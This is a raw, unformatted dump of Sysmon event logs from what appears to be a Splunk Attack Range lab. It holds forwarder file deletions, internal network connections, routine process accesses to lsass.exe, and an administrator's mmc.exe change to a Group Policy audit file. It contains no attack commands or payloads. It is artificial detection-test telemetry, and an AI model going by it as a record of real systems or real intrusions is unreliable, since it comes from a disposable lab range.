Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF10142D6E16C8539464791D76C38235,SHA256=B35885A35462AD5877EA8EAFF6E179104101B4C66A8B49BA5454E890F890E8E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:37.055{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D85E9CB5F81B7CF2119CCB4743CAEC2,SHA256=19956BC32329C2B4035958B97CBE54057F5B02F3823C2FB0C62AB4DF8264F91A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:38.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBB59BA39B390DEEBEF374C36C0B481F,SHA256=AF5401574E14056FA65EA246DA79469EB65E4EA559C24CDADE68FD79DCD694BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:38.070{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D06054DFE3EE41217E98E8D8CCEBB2ED,SHA256=C1032F3F95413E7E95B39CC65A76BBF32708B14630D228EA77DB4D9904DB9B18,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:37.630{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51243-false10.0.1.12-8000- 23542300x8000000000000000215196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:39.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C59F815BDB0A315978404A40938E51,SHA256=2EA02A7085D39D5E554C43CAF86C4F8FE1FE8CBDDD22C1BFD24702BCCDADC2D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:39.617{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:36.576{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:39.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C8AFAC45260EB3948B5BA108CA628C4,SHA256=28C378268C6062F4AB10F3DA3BB309E107E709B37EDDA4B47C02C945917207EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:40.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1C34A9C256BD9D3CEF1298208453C92,SHA256=64E168698EF2EC9AC6E9A1D117318DDDA2B7A18DCE3FC064B581D0435F94DDBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:40.102{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B437CE4384EB0BDAA1F405ECF43DCE0,SHA256=F4393A6DCD14A57C4BFAAF85981533029BB866D29A5FC8700B6BB1E290C6F5FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:41.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDE40FFF0BFF02D241630EACC66C39E,SHA256=E7A0818B349624E5B3EDF74D10284C37A8EDF948666DF33C0B18227F3AA66444,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:39.077{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000286295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:41.242{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000286294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:41.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD7649879D52FAE2874368BB65925E7B,SHA256=B1C9F1D9918F86280DF1E30C3BA2F1688E579A89CAD3A77974AF3D393A3C1914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:42.644{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5311A03AA2DBE23277F4CE98092F364C,SHA256=C7D4463E9E05384AE91F517A6EB6DEDB86882B6371018D83629FEF8804A3AA2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:40.718{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53319-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000286300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:40.718{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53319-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000286299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:42.258{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC7DD057DBF14CA0C43BC5EF0B3E3B84,SHA256=ECA1EBCC2F20900D46B184CE7C374FF3854D65FD37199209997CF2771D0173F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:42.258{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE1CC148A247621646A7061A07B1ADE0,SHA256=6AD13DE05EE5784158CA0C2B405338F789465561B12E7D78CB93DC158B6D2016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:42.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70404F8AD90E6B32989FDAA573128C33,SHA256=C3DBF63A3CB996F68875B01D9F78B1C186A650DCD98C53AA1A687915655850F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:43.676{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571BE9333B305639D4D7C75004612210,SHA256=6D3F3AE467640C04C7B4B077EFED8362248BCFC7755BA21BC6E36FCA8D73D730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:43.133{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC5F9568E7CDDD51303652A69F12505B,SHA256=2476C260DD66564EDA83174AD385422FAA5D97A20C6F4E0B8251463B6BBA5E51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:44.707{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00F732D5CC84EAF9882E42BA4B3E9E9,SHA256=325334FC410E3B0B1F6CDCCC9CD84532396AD71F50B5318B172CA4117825D60F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:42.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53320-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000286309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.602{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.602{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=618A8274155FDB057AA823F37CD8ED8E,SHA256=6889526DCADF58F4CA4F09466BD7DFC73E6349F8C40BA989CD0F1F4AD3A21B0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.570{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000286306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.461{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.445{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.445{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csvMD5=618A8274155FDB057AA823F37CD8ED8E,SHA256=6889526DCADF58F4CA4F09466BD7DFC73E6349F8C40BA989CD0F1F4AD3A21B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:44.133{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=633C977936E9D1FD9631F442D39C101A,SHA256=61F792FF64732EE630B5C15328AC7BAC45AA30B3BB43CDA1B464250D675E740B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FA5-6216-2004-000000003902}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.848{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 